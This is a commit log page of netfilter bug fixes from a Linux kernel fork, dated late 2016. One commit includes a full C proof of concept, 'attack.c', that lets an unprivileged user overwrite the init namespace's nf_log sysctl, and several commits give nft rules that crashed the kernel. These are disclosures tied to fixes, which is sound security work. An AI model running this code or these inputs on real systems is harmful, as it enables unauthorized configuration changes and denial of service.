Eric Lee / smarc-fsl-linux-kernel

24 Nov, 2016

5 commits

49cdc4c74 netfilter: nft_range: add the missing NULL pointer check ... Browse Code »

Otherwise, kernel panic will happen if the user does not specify
the related attributes.

Fixes: 0f3cd9b36977 ("netfilter: nf_tables: add range expression")
Signed-off-by: Liping Zhang
Signed-off-by: Pablo Neira Ayuso

Liping Zhang
2016-11-24 21:43:35 +0800
d3e2a1110 netfilter: nf_tables: fix inconsistent element expiration calculation ... Browse Code »

As Liping Zhang reports, after commit a8b1e36d0d1d ("netfilter: nft_dynset:
fix element timeout for HZ != 1000"), priv->timeout was stored in jiffies,
while set->timeout was stored in milliseconds. This is inconsistent and
incorrect.

Firstly, we already call msecs_to_jiffies in nft_set_elem_init, so
priv->timeout will be converted to jiffies twice.

Secondly, if the user did not specify the NFTA_DYNSET_TIMEOUT attr,
set->timeout will be used, but we forget to call msecs_to_jiffies
when do update elements.

Fix this by using jiffies internally for traditional sets and doing the
conversions to/from msec when interacting with userspace - as dynset
already does.

This is preferable to doing the conversions, when elements are inserted or
updated, because this can happen very frequently on busy dynsets.

Fixes: a8b1e36d0d1d ("netfilter: nft_dynset: fix element timeout for HZ != 1000")
Reported-by: Liping Zhang
Signed-off-by: Anders K. Pedersen
Acked-by: Liping Zhang
Signed-off-by: Pablo Neira Ayuso

Anders K. Pedersen
2016-11-24 21:43:34 +0800
7223ecd46 netfilter: nat: switch to new rhlist interface ... Browse Code »

I got offlist bug report about failing connections and high cpu usage.
This happens because we hit 'elasticity' checks in rhashtable that
refuses bucket list exceeding 16 entries.

The nat bysrc hash unfortunately needs to insert distinct objects that
share same key and are identical (have same source tuple), this cannot
be avoided.

Switch to the rhlist interface which is designed for this.

The nulls_base is removed here, I don't think its needed:

A (unlikely) false positive results in unneeded port clash resolution,
a false negative results in packet drop during conntrack confirmation,
when we try to insert the duplicate into main conntrack hash table.

Tested by adding multiple ip addresses to host, then adding
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

... and then creating multiple connections, from same source port but
different addresses:

for i in $(seq 2000 2032);do nc -p 1234 192.168.7.1 $i > /dev/null & done

(all of these then get hashed to same bysource slot)

Then, to test that nat conflict resultion is working:

nc -s 10.0.0.1 -p 1234 192.168.7.1 2000
nc -s 10.0.0.2 -p 1234 192.168.7.1 2000

tcp .. src=10.0.0.1 dst=192.168.7.1 sport=1234 dport=2000 src=192.168.7.1 dst=192.168.7.10 sport=2000 dport=1024 [ASSURED]
tcp .. src=10.0.0.2 dst=192.168.7.1 sport=1234 dport=2000 src=192.168.7.1 dst=192.168.7.10 sport=2000 dport=1025 [ASSURED]
tcp .. src=192.168.7.10 dst=192.168.7.1 sport=1234 dport=2000 src=192.168.7.1 dst=192.168.7.10 sport=2000 dport=1234 [ASSURED]
tcp .. src=192.168.7.10 dst=192.168.7.1 sport=1234 dport=2001 src=192.168.7.1 dst=192.168.7.10 sport=2001 dport=1234 [ASSURED]
[..]

-> nat altered source ports to 1024 and 1025, respectively.
This can also be confirmed on destination host which shows
ESTAB 0 0 192.168.7.1:2000 192.168.7.10:1024
ESTAB 0 0 192.168.7.1:2000 192.168.7.10:1025
ESTAB 0 0 192.168.7.1:2000 192.168.7.10:1234

Cc: Herbert Xu
Fixes: 870190a9ec907 ("netfilter: nat: convert nat bysrc hash to rhashtable")
Signed-off-by: Florian Westphal
Signed-off-by: Pablo Neira Ayuso

Florian Westphal
2016-11-24 21:43:34 +0800
728e87b49 netfilter: nat: fix cmp return value ... Browse Code »

The comparator works like memcmp, i.e. 0 means objects are equal.
In other words, when objects are distinct they are treated as identical,
when they are distinct they are allegedly the same.

The first case is rare (distinct objects are unlikely to get hashed to
same bucket).

The second case results in unneeded port conflict resolutions attempts.

Fixes: 870190a9ec907 ("netfilter: nat: convert nat bysrc hash to rhashtable")
Signed-off-by: Florian Westphal
Signed-off-by: Pablo Neira Ayuso

Florian Westphal
2016-11-24 21:43:33 +0800
abd66e9f3 netfilter: nft_hash: validate maximum value of u32 netlink hash attribute ... Browse Code »

Use the function nft_parse_u32_check() to fetch the value and validate
the u32 attribute into the hash len u8 field.

This patch revisits 4da449ae1df9 ("netfilter: nft_exthdr: Add size check
on u8 nft_exthdr attributes").

Fixes: cb1b69b0b15b ("netfilter: nf_tables: add hash expression")
Signed-off-by: Laura Garcia Liebana
Signed-off-by: Pablo Neira Ayuso

Laura Garcia Liebana
2016-11-24 21:40:03 +0800

09 Nov, 2016

5 commits

58c78e104 netfilter: nf_tables: fix oops when inserting an element into a verdict map ... Browse Code »

Dalegaard says:
The following ruleset, when loaded with 'nft -f bad.txt'
----snip----
flush ruleset
table ip inlinenat {
map sourcemap {
type ipv4_addr : verdict;
}

chain postrouting {
ip saddr vmap @sourcemap accept
}
}
add chain inlinenat test
add element inlinenat sourcemap { 100.123.10.2 : jump test }
----snip----

results in a kernel oops:
BUG: unable to handle kernel paging request at 0000000000001344
IP: [] nf_tables_check_loops+0x114/0x1f0 [nf_tables]
[...]
Call Trace:
[] ? nft_data_init+0x13e/0x1a0 [nf_tables]
[] nft_validate_register_store+0x60/0xb0 [nf_tables]
[] nft_add_set_elem+0x545/0x5e0 [nf_tables]
[] ? nft_table_lookup+0x30/0x60 [nf_tables]
[] ? nla_strcmp+0x40/0x50
[] nf_tables_newsetelem+0x11e/0x210 [nf_tables]
[] ? nla_validate+0x60/0x80
[] nfnetlink_rcv+0x354/0x5a7 [nfnetlink]

Because we forget to fill the net pointer in bind_ctx, so dereferencing
it may cause kernel crash.

Reported-by: Dalegaard
Signed-off-by: Liping Zhang
Signed-off-by: Pablo Neira Ayuso

Liping Zhang
2016-11-09 06:53:39 +0800
e0df8cae6 netfilter: conntrack: refine gc worker heuristics ... Browse Code »

Nicolas Dichtel says:
After commit b87a2f9199ea ("netfilter: conntrack: add gc worker to
remove timed-out entries"), netlink conntrack deletion events may be
sent with a huge delay.

Nicolas further points at this line:

goal = min(nf_conntrack_htable_size / GC_MAX_BUCKETS_DIV, GC_MAX_BUCKETS);

and indeed, this isn't optimal at all. Rationale here was to ensure that
we don't block other work items for too long, even if
nf_conntrack_htable_size is huge. But in order to have some guarantee
about maximum time period where a scan of the full conntrack table
completes we should always use a fixed slice size, so that once every
N scans the full table has been examined at least once.

We also need to balance this vs. the case where the system is either idle
(i.e., conntrack table (almost) empty) or very busy (i.e. eviction happens
from packet path).

So, after some discussion with Nicolas:

1. want hard guarantee that we scan entire table at least once every X s
-> need to scan fraction of table (get rid of upper bound)

2. don't want to eat cycles on idle or very busy system
-> increase interval if we did not evict any entries

3. don't want to block other worker items for too long
-> make fraction really small, and prefer small scan interval instead

4. Want reasonable short time where we detect timed-out entry when
system went idle after a burst of traffic, while not doing scans
all the time.
-> Store next gc scan in worker, increasing delays when no eviction
happened and shrinking delay when we see timed out entries.

The old gc interval is turned into a max number, scans can now happen
every jiffy if stale entries are present.

Longest possible time period until an entry is evicted is now 2 minutes
in worst case (entry expires right after it was deemed 'not expired').

Reported-by: Nicolas Dichtel
Signed-off-by: Florian Westphal
Acked-by: Nicolas Dichtel
Signed-off-by: Pablo Neira Ayuso

Florian Westphal
2016-11-09 06:53:38 +0800
6114cc516 netfilter: conntrack: fix CT target for UNSPEC helpers ... Browse Code »

Thomas reports its not possible to attach the H.245 helper:

iptables -t raw -A PREROUTING -p udp -j CT --helper H.245
iptables: No chain/target/match by that name.
xt_CT: No such helper "H.245"

This is because H.245 registers as NFPROTO_UNSPEC, but the CT target
passes NFPROTO_IPV4/IPV6 to nf_conntrack_helper_try_module_get.

We should treat UNSPEC as wildcard and ignore the l3num instead.

Reported-by: Thomas Woerner
Signed-off-by: Florian Westphal
Signed-off-by: Pablo Neira Ayuso

Florian Westphal
2016-11-09 06:53:37 +0800
fb9c9649a netfilter: connmark: ignore skbs with magic untracked conntrack objects ... Browse Code »

The (percpu) untracked conntrack entries can end up with nonzero connmarks.

The 'untracked' conntrack objects are merely a way to distinguish INVALID
(i.e. protocol connection tracker says payload doesn't meet some
requirements or packet was never seen by the connection tracking code)
from packets that are intentionally not tracked (some icmpv6 types such as
neigh solicitation, or by using 'iptables -j CT --notrack' option).

Untracked conntrack objects are implementation detail, we might as well use
invalid magic address instead to tell INVALID and UNTRACKED apart.

Check skb->nfct for untracked dummy and behave as if skb->nfct is NULL.

Reported-by: XU Tianwen
Signed-off-by: Florian Westphal
Signed-off-by: Pablo Neira Ayuso

Florian Westphal
2016-11-09 06:53:36 +0800
8fbfef7f5 ipvs: use IPVS_CMD_ATTR_MAX for family.maxattr ... Browse Code »

family.maxattr is the max index for policy[], the size of
ops[] is determined with ARRAY_SIZE().

Reported-by: Andrey Konovalov
Tested-by: Andrey Konovalov
Cc: Pablo Neira Ayuso
Signed-off-by: Cong Wang
Signed-off-by: Simon Horman
Signed-off-by: Pablo Neira Ayuso

WANG Cong
2016-11-09 06:53:30 +0800

31 Oct, 2016

1 commit

c17c3cdff netfilter: nf_tables: destroy the set if fail to add transaction ... Browse Code »

When the memory is exhausted, then we will fail to add the NFT_MSG_NEWSET
transaction. In such case, we should destroy the set before we free it.

Fixes: 958bee14d071 ("netfilter: nf_tables: use new transaction infrastructure to handle sets")
Signed-off-by: Liping Zhang
Signed-off-by: Pablo Neira Ayuso

Liping Zhang
2016-10-31 20:17:29 +0800

28 Oct, 2016

6 commits

574762025 netfilter: ip_vs_sync: fix bogus maybe-uninitialized warning ... Browse Code »

Building the ip_vs_sync code with CONFIG_OPTIMIZE_INLINING on x86
confuses the compiler to the point where it produces a rather
dubious warning message:

net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘opt.init_seq’ may be used uninitialized in this function [-Werror=maybe-uninitialized]
struct ip_vs_sync_conn_options opt;
^~~
net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘opt.delta’ may be used uninitialized in this function [-Werror=maybe-uninitialized]
net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘opt.previous_delta’ may be used uninitialized in this function [-Werror=maybe-uninitialized]
net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘*((void *)&opt+12).init_seq’ may be used uninitialized in this function [-Werror=maybe-uninitialized]
net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘*((void *)&opt+12).delta’ may be used uninitialized in this function [-Werror=maybe-uninitialized]
net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘*((void *)&opt+12).previous_delta’ may be used uninitialized in this function [-Werror=maybe-uninitialized]

The problem appears to be a combination of a number of factors, including
the __builtin_bswap32 compiler builtin being slightly odd, having a large
amount of code inlined into a single function, and the way that some
functions only get partially inlined here.

I've spent way too much time trying to work out a way to improve the
code, but the best I've come up with is to add an explicit memset
right before the ip_vs_seq structure is first initialized here. When
the compiler works correctly, this has absolutely no effect, but in the
case that produces the warning, the warning disappears.

In the process of analysing this warning, I also noticed that
we use memcpy to copy the larger ip_vs_sync_conn_options structure
over two members of the ip_vs_conn structure. This works because
the layout is identical, but seems error-prone, so I'm changing
this in the process to directly copy the two members. This change
seemed to have no effect on the object code or the warning, but
it deals with the same data, so I kept the two changes together.

Signed-off-by: Arnd Bergmann
Acked-by: Julian Anastasov
Signed-off-by: Simon Horman
Signed-off-by: Pablo Neira Ayuso

Arnd Bergmann
2016-10-28 20:14:51 +0800
f1d505bb7 netfilter: nf_tables: fix type mismatch with error return from nft_parse_u32_check ... Browse Code »

Commit 36b701fae12ac ("netfilter: nf_tables: validate maximum value of
u32 netlink attributes") introduced nft_parse_u32_check with a return
value of "unsigned int", yet on error it returns "-ERANGE".

This patch corrects the mismatch by changing the return value to "int",
which happens to match the actual users of nft_parse_u32_check already.

Found by Coverity, CID 1373930.

Note that commit 21a9e0f1568ea ("netfilter: nft_exthdr: fix error
handling in nft_exthdr_init()) attempted to address the issue, but
did not address the return type of nft_parse_u32_check.

Signed-off-by: John W. Linville
Cc: Laura Garcia Liebana
Cc: Pablo Neira Ayuso
Cc: Dan Carpenter
Fixes: 36b701fae12ac ("netfilter: nf_tables: validate maximum value...")
Signed-off-by: Pablo Neira Ayuso

John W. Linville
2016-10-28 00:29:01 +0800
444f90174 netfilter: nf_conntrack_sip: extend request line validation ... Browse Code »

on SIP requests, so a fragmented TCP SIP packet from an allow header starting with
INVITE,NOTIFY,OPTIONS,REFER,REGISTER,UPDATE,SUBSCRIBE
Content-Length: 0

will not bet interpreted as an INVITE request. Also Request-URI must start with an alphabetic character.

Confirm with RFC 3261
Request-Line = Method SP Request-URI SP SIP-Version CRLF

Fixes: 30f33e6dee80 ("[NETFILTER]: nf_conntrack_sip: support method specific request/response handling")
Signed-off-by: Ulrich Weber
Acked-by: Marco Angaroni
Signed-off-by: Pablo Neira Ayuso

Ulrich Weber
2016-10-28 00:27:59 +0800
dab45060a netfilter: nf_tables: fix race when create new element in dynset ... Browse Code »

Packets may race when create the new element in nft_hash_update:
CPU0 CPU1
lookup_fast - fail lookup_fast - fail
new - ok new - ok
insert - ok insert - fail(EEXIST)

So when race happened, we reuse the existing element. Otherwise,
these *racing* packets will not be handled properly.

Fixes: 22fe54d5fefc ("netfilter: nf_tables: add support for dynamic set updates")
Signed-off-by: Liping Zhang
Signed-off-by: Pablo Neira Ayuso

Liping Zhang
2016-10-28 00:22:02 +0800
61f9e2924 netfilter: nf_tables: fix *leak* when expr clone fail ... Browse Code »

When nft_expr_clone failed, a series of problems will happen:

1. module refcnt will leak, we call __module_get at the beginning but
we forget to put it back if ops->clone returns fail
2. memory will be leaked, if clone fail, we just return NULL and forget
to free the alloced element
3. set->nelems will become incorrect when set->size is specified. If
clone fail, we should decrease the set->nelems

Now this patch fixes these problems. And fortunately, clone fail will
only happen on counter expression when memory is exhausted.

Fixes: 086f332167d6 ("netfilter: nf_tables: add clone interface to expression operations")
Signed-off-by: Liping Zhang
Signed-off-by: Pablo Neira Ayuso

Liping Zhang
2016-10-28 00:20:45 +0800
bb6a6e8e0 netfilter: nft_dynset: fix panic if NFT_SET_HASH is not enabled ... Browse Code »

When CONFIG_NFT_SET_HASH is not enabled and I input the following rule:
"nft add rule filter output flow table test {ip daddr counter }", kernel
panic happened on my system:
BUG: unable to handle kernel NULL pointer dereference at (null)
IP: [< (null)>] (null)
[...]
Call Trace:
[] ? nft_dynset_eval+0x56/0x100 [nf_tables]
[] nft_do_chain+0xfb/0x4e0 [nf_tables]
[] ? nf_conntrack_tuple_taken+0x61/0x210 [nf_conntrack]
[] ? get_unique_tuple+0x136/0x560 [nf_nat]
[] ? __nf_ct_ext_add_length+0x111/0x130 [nf_conntrack]
[] ? nf_nat_setup_info+0x87/0x3b0 [nf_nat]
[] ? ipt_do_table+0x327/0x610
[] ? __nf_nat_alloc_null_binding+0x57/0x80 [nf_nat]
[] nft_ipv4_output+0xaf/0xd0 [nf_tables_ipv4]
[] nf_iterate+0x55/0x60
[] nf_hook_slow+0x73/0xd0

Because in rbtree type set, ops->update is not implemented. So just keep
it simple, in such case, report -EOPNOTSUPP to the user space.

Fixes: 22fe54d5fefc ("netfilter: nf_tables: add support for dynamic set updates")
Signed-off-by: Liping Zhang
Signed-off-by: Pablo Neira Ayuso

Liping Zhang
2016-10-28 00:20:08 +0800

21 Oct, 2016

2 commits

7034b566a netfilter: fix nf_queue handling ... Browse Code »

nf_queue handling is broken since e3b37f11e6e4 ("netfilter: replace
list_head with single linked list") for two reasons:

1) If the bypass flag is set on, there are no userspace listeners and
we still have more hook entries to iterate over, then jump to the
next hook. Otherwise accept the packet. On nf_reinject() path, the
okfn() needs to be invoked.

2) We should not re-enter the same hook on packet reinjection. If the
packet is accepted, we have to skip the current hook from where the
packet was enqueued, otherwise the packets gets enqueued over and
over again.

This restores the previous list_for_each_entry_continue() behaviour
happening from nf_iterate() that was dealing with these two cases.
This patch introduces a new nf_queue() wrapper function so this fix
becomes simpler.

Fixes: e3b37f11e6e4 ("netfilter: replace list_head with single linked list")
Signed-off-by: Pablo Neira Ayuso

Pablo Neira Ayuso
2016-10-21 01:59:59 +0800
7bb6615d3 netfilter: conntrack: restart gc immediately if GC_MAX_EVICTS is reached ... Browse Code »

When the maximum evictions number is reached, do not wait 5 seconds before
the next run.

CC: Florian Westphal
Signed-off-by: Nicolas Dichtel
Acked-by: Florian Westphal
Signed-off-by: Pablo Neira Ayuso

Nicolas Dichtel
2016-10-21 01:59:53 +0800

20 Oct, 2016

1 commit

1ecc281ec netfilter: x_tables: suppress kmemcheck warning ... Browse Code »

Markus Trippelsdorf reports:

WARNING: kmemcheck: Caught 64-bit read from uninitialized memory (ffff88001e605480)
4055601e0088ffff000000000000000090686d81ffffffff0000000000000000
u u u u u u u u u u u u u u u u i i i i i i i i u u u u u u u u
^
|RIP: 0010:[] [] nf_register_net_hook+0x51/0x160
[..]
[] nf_register_net_hook+0x51/0x160
[] nf_register_net_hooks+0x3f/0xa0
[] ipt_register_table+0xe5/0x110
[..]

This warning is harmless; we copy 'uninitialized' data from the hook ops
but it will not be used.
Long term the structures keeping run-time data should be disentangled
from those only containing config-time data (such as where in the list
to insert a hook), but thats -next material.

Reported-by: Markus Trippelsdorf
Suggested-by: Al Viro
Signed-off-by: Florian Westphal
Acked-by: Aaron Conole
Signed-off-by: Pablo Neira Ayuso

Florian Westphal
2016-10-20 00:32:24 +0800

18 Oct, 2016

2 commits

d2e4d5935 netfilter: nf_tables: avoid uninitialized variable warning ... Browse Code »

The newly added nft_range_eval() function handles the two possible
nft range operations, but as the compiler warning points out,
any unexpected value would lead to the 'mismatch' variable being
used without being initialized:

net/netfilter/nft_range.c: In function 'nft_range_eval':
net/netfilter/nft_range.c:45:5: error: 'mismatch' may be used uninitialized in this function [-Werror=maybe-uninitialized]

This removes the variable in question and instead moves the
condition into the switch itself, which is potentially more
efficient than adding a bogus 'default' clause as in my
first approach, and is nicer than using the 'uninitialized_var'
macro.

Fixes: 0f3cd9b36977 ("netfilter: nf_tables: add range expression")
Link: http://patchwork.ozlabs.org/patch/677114/
Signed-off-by: Arnd Bergmann
Signed-off-by: Pablo Neira Ayuso

Arnd Bergmann
2016-10-18 23:35:10 +0800
ccca6607c netfilter: nft_range: validate operation netlink attribute ... Browse Code »

Use nft_parse_u32_check() to make sure we don't get a value over the
unsigned 8-bit integer. Moreover, make sure this value doesn't go over
the two supported range comparison modes.

Fixes: 9286c2eb1fda ("netfilter: nft_range: validate operation netlink attribute")
Signed-off-by: Pablo Neira Ayuso

Pablo Neira Ayuso
2016-10-18 00:57:02 +0800

17 Oct, 2016

7 commits

21a9e0f15 netfilter: nft_exthdr: fix error handling in nft_exthdr_init() ... Browse Code »

"err" needs to be signed for the error handling to work.

Fixes: 36b701fae12a ('netfilter: nf_tables: validate maximum value of u32 netlink attributes')
Signed-off-by: Dan Carpenter
Signed-off-by: Pablo Neira Ayuso

Dan Carpenter
2016-10-17 23:43:54 +0800
09525a09a netfilter: nf_tables: underflow in nft_parse_u32_check() ... Browse Code »

We don't want to allow negatives here.

Fixes: 36b701fae12a ('netfilter: nf_tables: validate maximum value of u32 netlink attributes')
Signed-off-by: Dan Carpenter
Signed-off-by: Pablo Neira Ayuso

Dan Carpenter
2016-10-17 23:43:53 +0800
5751e175c netfilter: nft_hash: add missing NFTA_HASH_OFFSET's nla_policy ... Browse Code »

Missing the nla_policy description will also miss the validation check
in kernel.

Fixes: 70ca767ea1b2 ("netfilter: nft_hash: Add hash offset value")
Signed-off-by: Liping Zhang
Signed-off-by: Pablo Neira Ayuso

Liping Zhang
2016-10-17 23:43:53 +0800
f434ed0a0 netfilter: xt_ipcomp: add "ip[6]t_ipcomp" module alias name ... Browse Code »

Otherwise, user cannot add related rules if xt_ipcomp.ko is not loaded:
# iptables -A OUTPUT -p 108 -m ipcomp --ipcompspi 1
iptables: No chain/target/match by that name.

Signed-off-by: Liping Zhang
Signed-off-by: Pablo Neira Ayuso

Liping Zhang
2016-10-17 23:38:19 +0800
6d19375b5 netfilter: xt_NFLOG: fix unexpected truncated packet ... Browse Code »

Justin and Chris spotted that iptables NFLOG target was broken when they
upgraded the kernel to 4.8: "ulogd-2.0.5- IPs are no longer logged" or
"results in segfaults in ulogd-2.0.5".

Because "struct nf_loginfo li;" is a local variable, and flags will be
filled with garbage value, not inited to zero. So if it contains 0x1,
packets will not be logged to the userspace anymore.

Fixes: 7643507fe8b5 ("netfilter: xt_NFLOG: nflog-range does not truncate packets")
Reported-by: Justin Piszcz
Reported-by: Chris Caputo
Tested-by: Chris Caputo
Signed-off-by: Liping Zhang
Signed-off-by: Pablo Neira Ayuso

Liping Zhang
2016-10-17 23:38:19 +0800
a8b1e36d0 netfilter: nft_dynset: fix element timeout for HZ != 1000 ... Browse Code »

With HZ=100 element timeout in dynamic sets (i.e. flow tables) is 10 times
higher than configured.

Add proper conversion to/from jiffies, when interacting with userspace.

I tested this on Linux 4.8.1, and it applies cleanly to current nf and
nf-next trees.

Fixes: 22fe54d5fefc ("netfilter: nf_tables: add support for dynamic set updates")
Signed-off-by: Anders K. Pedersen
Signed-off-by: Pablo Neira Ayuso

Anders K. Pedersen
2016-10-17 23:29:39 +0800
1b203c138 netfilter: xt_hashlimit: Add missing ULL suffixes for 64-bit constants ... Browse Code »

On 32-bit (e.g. with m68k-linux-gnu-gcc-4.1):

net/netfilter/xt_hashlimit.c: In function ‘user2credits’:
net/netfilter/xt_hashlimit.c:476: warning: integer constant is too large for ‘long’ type
...
net/netfilter/xt_hashlimit.c:478: warning: integer constant is too large for ‘long’ type
...
net/netfilter/xt_hashlimit.c:480: warning: integer constant is too large for ‘long’ type
...

net/netfilter/xt_hashlimit.c: In function ‘rateinfo_recalc’:
net/netfilter/xt_hashlimit.c:513: warning: integer constant is too large for ‘long’ type

Fixes: 11d5f15723c9f39d ("netfilter: xt_hashlimit: Create revision 2 to support higher pps rates")
Signed-off-by: Geert Uytterhoeven
Acked-by: Vishwanath Pai
Signed-off-by: Pablo Neira Ayuso

Geert Uytterhoeven
2016-10-17 23:25:23 +0800

11 Oct, 2016

1 commit

bd3769bfe netfilter: Fix slab corruption. ... Browse Code »

Use the correct pattern for singly linked list insertion and
deletion. We can also calculate the list head outside of the
mutex.

Fixes: e3b37f11e6e4 ("netfilter: replace list_head with single linked list")
Signed-off-by: Linus Torvalds
Reviewed-by: Aaron Conole
Signed-off-by: David S. Miller

net/netfilter/core.c | 108 ++++++++++++++++-----------------------------------
1 file changed, 33 insertions(+), 75 deletions(-)

Linus Torvalds
2016-10-11 16:44:37 +0800

04 Oct, 2016

2 commits

2fa46c130 netfilter: nft_limit: fix divided by zero panic ... Browse Code »

After I input the following nftables rule, a panic happened on my system:
# nft add rule filter OUTPUT limit rate 0xf00000000 bytes/second

divide error: 0000 [#1] SMP
[ ... ]
RIP: 0010:[] []
nft_limit_pkt_bytes_eval+0x2e/0xa0 [nft_limit]
Call Trace:
[] nft_do_chain+0xfb/0x4e0 [nf_tables]
[] ? nf_nat_setup_info+0x96/0x480 [nf_nat]
[] ? ipt_do_table+0x327/0x610
[] ? __nf_nat_alloc_null_binding+0x57/0x80 [nf_nat]
[] nft_ipv4_output+0xaf/0xd0 [nf_tables_ipv4]
[] nf_iterate+0x62/0x80
[] nf_hook_slow+0x73/0xd0
[] __ip_local_out+0xcd/0xe0
[] ? ip_forward_options+0x1b0/0x1b0
[] ip_local_out+0x1c/0x40

This is because divisor is 64-bit, but we treat it as a 32-bit integer,
then 0xf00000000 becomes zero, i.e. divisor becomes 0.

Signed-off-by: Liping Zhang
Signed-off-by: Pablo Neira Ayuso

Liping Zhang
2016-10-04 14:59:03 +0800
dbb5918cb netfilter: fix namespace handling in nf_log_proc_dostring ... Browse Code »

nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.

Stash the "struct net *" in extra2 - data and extra1 are already used.

Repro code:

#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

char child_stack[1000000];

uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;

void writefile(char *path, char *buf) {
int fd = open(path, O_WRONLY);
if (fd == -1)
err(1, "unable to open thing");
if (write(fd, buf, strlen(buf)) != strlen(buf))
err(1, "unable to write thing");
close(fd);
}

int child_fn(void *p_) {
if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
NULL))
err(1, "mount");

/* Yes, we need to set the maps for the net sysctls to recognize us
* as namespace root.
*/
char buf[1000];
sprintf(buf, "0 %d 1\n", (int)outer_uid);
writefile("/proc/1/uid_map", buf);
writefile("/proc/1/setgroups", "deny");
sprintf(buf, "0 %d 1\n", (int)outer_gid);
writefile("/proc/1/gid_map", buf);

stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
if (stolen_fd == -1)
err(1, "open nf_log");
return 0;
}

int main(void) {
outer_uid = getuid();
outer_gid = getgid();

int child = clone(child_fn, child_stack + sizeof(child_stack),
CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
|CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
if (child == -1)
err(1, "clone");
int status;
if (wait(&status) != child)
err(1, "wait");
if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
errx(1, "child exit status bad");

char *data = "NONE";
if (write(stolen_fd, data, strlen(data)) != strlen(data))
err(1, "write");
return 0;
}

Repro:

$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE

Because this looks like an issue with very low severity, I'm sending it to
the public list directly.

Signed-off-by: Jann Horn
Signed-off-by: Pablo Neira Ayuso

Jann Horn
2016-10-04 14:41:06 +0800

01 Oct, 2016

3 commits

1f827f513 netfilter: xt_hashlimit: Fix link error in 32bit arch because of 64bit division ... Browse Code »

Division of 64bit integers will cause linker error undefined reference
to `__udivdi3'. Fix this by replacing divisions with div64_64

Fixes: 11d5f15723c9 ("netfilter: xt_hashlimit: Create revision 2 to ...")
Signed-off-by: Vishwanath Pai
Acked-by: Maciej Żenczykowski
Signed-off-by: Pablo Neira Ayuso

Vishwanath Pai
2016-10-01 02:15:27 +0800
7816ec564 netfilter: accommodate different kconfig in nf_set_hooks_head ... Browse Code »

When CONFIG_NETFILTER_INGRESS is unset (or no), we need to handle
the request for registration properly by dropping the hook. This
releases the entry during the set.

Fixes: e3b37f11e6e4 ("netfilter: replace list_head with single linked list")
Signed-off-by: Aaron Conole
Signed-off-by: Pablo Neira Ayuso

Aaron Conole
2016-10-01 02:15:26 +0800
5119e4381 netfilter: Fix potential null pointer dereference ... Browse Code »

It's possible for nf_hook_entry_head to return NULL. If two
nf_unregister_net_hook calls happen simultaneously with a single hook
entry in the list, both will enter the nf_hook_mutex critical section.
The first will successfully delete the head, but the second will see
this NULL pointer and attempt to dereference.

This fix ensures that no null pointer dereference could occur when such
a condition happens.

Fixes: e3b37f11e6e4 ("netfilter: replace list_head with single linked list")
Signed-off-by: Aaron Conole
Signed-off-by: Pablo Neira Ayuso

Aaron Conole
2016-10-01 02:15:26 +0800

26 Sep, 2016

4 commits

f20fbc071 Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next ... Browse Code »

Conflicts:
net/netfilter/core.c
net/netfilter/nf_tables_netdev.c

Resolve two conflicts before pull request for David's net-next tree:

1) Between c73c24849011 ("netfilter: nf_tables_netdev: remove redundant
ip_hdr assignment") from the net tree and commit ddc8b6027ad0
("netfilter: introduce nft_set_pktinfo_{ipv4, ipv6}_validate()").

2) Between e8bffe0cf964 ("net: Add _nf_(un)register_hooks symbols") and
Aaron Conole's patches to replace list_head with single linked list.

Signed-off-by: Pablo Neira Ayuso

Pablo Neira Ayuso
2016-09-26 05:34:19 +0800
8cb2a7d56 netfilter: nf_log: get rid of XT_LOG_* macros ... Browse Code »

nf_log is used by both nftables and iptables, so use XT_LOG_XXX macros
here is not appropriate. Replace them with NF_LOG_XXX.

Signed-off-by: Liping Zhang
Signed-off-by: Pablo Neira Ayuso

Liping Zhang
2016-09-26 05:16:45 +0800
ff107d277 netfilter: nft_log: complete NFTA_LOG_FLAGS attr support ... Browse Code »

NFTA_LOG_FLAGS attribute is already supported, but the related
NF_LOG_XXX flags are not exposed to the userspace. So we cannot
explicitly enable log flags to log uid, tcp sequence, ip options
and so on, i.e. such rule "nft add rule filter output log uid"
is not supported yet.

So move NF_LOG_XXX macro definitions to the uapi/../nf_log.h. In
order to keep consistent with other modules, change NF_LOG_MASK to
refer to all supported log flags. On the other hand, add a new
NF_LOG_DEFAULT_MASK to refer to the original default log flags.

Finally, if user specify the unsupported log flags or NFTA_LOG_GROUP
and NFTA_LOG_FLAGS are set at the same time, report EINVAL to the
userspace.

Signed-off-by: Liping Zhang
Signed-off-by: Pablo Neira Ayuso

Liping Zhang
2016-09-26 05:16:43 +0800
0f3cd9b36 netfilter: nf_tables: add range expression ... Browse Code »

Inverse ranges != [a,b] are not currently possible because rules are
composites of && operations, and we need to express this:

data < a || data > b

This patch adds a new range expression. Positive ranges can be already
through two cmp expressions:

cmp(sreg, data, >=)
cmp(sreg, data,

Pablo Neira Ayuso
2016-09-26 05:16:42 +0800

25 Sep, 2016

1 commit

58e207e49 netfilter: evict stale entries when user reads /proc/net/nf_conntrack ... Browse Code »

Fabian reports a possible conntrack memory leak (could not reproduce so
far), however, one minor issue can be easily resolved:

> cat /proc/net/nf_conntrack | wc -l = 5
> 4 minutes required to clean up the table.

We should not report those timed-out entries to the user in first place.
And instead of just skipping those timed-out entries while iterating over
the table we can also zap them (we already do this during ctnetlink
walks, but I forgot about the /proc interface).

